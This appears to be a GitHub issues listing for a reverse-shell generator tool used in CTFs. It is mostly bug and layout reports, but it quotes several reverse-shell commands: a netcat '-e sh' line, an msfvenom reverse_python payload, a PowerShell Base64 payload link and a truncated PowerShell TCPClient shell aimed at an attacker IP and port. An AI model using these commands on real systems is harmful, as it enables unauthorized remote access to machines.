reverse-shell-generator icon indicating copy to clipboard operation
reverse-shell-generator copied to clipboard

Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)

Results 35 reverse-shell-generator issues
Sort by recently updated
recently updated
newest added

Hi! I try to update [github corner](https://tholman.com/github-corners/) colors for dark theme. You can view updated page [here](https://devxprite.github.io/reverse-shell-generator/) . ### Preview: **Before:** ![before](https://user-images.githubusercontent.com/80192140/177925788-5c8e90e8-3f5f-468a-a472-cd17d8304423.PNG) **After:** ![after](https://user-images.githubusercontent.com/80192140/177925855-0e6648e7-2d95-41f6-ad57-c6d7f1a658d2.PNG)

When you try to generate a nc.exe revshell. the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe...

For msfvenom, the command for "Python Stageless Reverse TCP" is : `"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",` this commande make a "shell.py" but cmd/unix/... is design...

fixed issue #163 Fixed CSS so that max width decreases for small devices which prevents overflow of div(content). Here is an image of fixed version:: ![image](https://github.com/0dayCTF/reverse-shell-generator/assets/138952788/d98482b6-83a7-40ee-ab62-a24bab023c84)

![image](https://github.com/0dayCTF/reverse-shell-generator/assets/138952788/d587ab62-6819-434b-8023-d45d834d280a) There is an issue while rendering the website in mobile devices. The content gets overflowed outside div.

![image](https://github.com/0dayCTF/reverse-shell-generator/assets/25397908/1e7e9032-3e0e-495f-8eaf-7b5707fc12a8) Currently pwncat listener only shows like: `python3 -m pwncat -lp [port]` But on windows, we need optional argument `-m windows`, like `pwncat-cs -m windows -lp [port]`.

Hey, when I try to generate the raw view of that payload PowerShell #3 (Base64) I get an error Invocation Failed. ![grafik](https://github.com/0dayCTF/reverse-shell-generator/assets/9527130/03e1baca-2334-430f-9de5-ddfef1121151) Here the link: https://www.revshells.com/PowerShell%20%233%20(Base64)?ip=10.10.16.2&port=1337&shell=sh&encoding=sh

Add groovy shell compatibility for Windows and Linux by updating the cmd string. For instance if jenkins was installed on Windows versus Linux, they would be different.

Hi, Please add this PowerShell reverse shell as it's better than all the ones included: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 ```ps $client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne...